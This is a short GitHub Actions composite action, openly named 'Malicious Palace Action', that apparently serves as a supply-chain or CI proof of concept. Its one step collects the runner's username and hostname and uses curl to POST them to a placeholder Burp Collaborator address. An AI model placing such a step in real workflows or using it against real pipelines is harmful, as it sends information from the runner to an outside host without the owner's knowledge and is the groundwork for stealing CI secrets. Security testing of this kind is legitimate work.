name: "Malicious Palace Action"
description: "Pings Burp Collaborator"
runs:
  using: "composite"
  steps:
    - shell: bash
      run: |
        whoami > payload.txt
        hostname >> payload.txt
        curl -X POST --data-binary @payload.txt http://YOUR-BURP-ID.oastify.com/
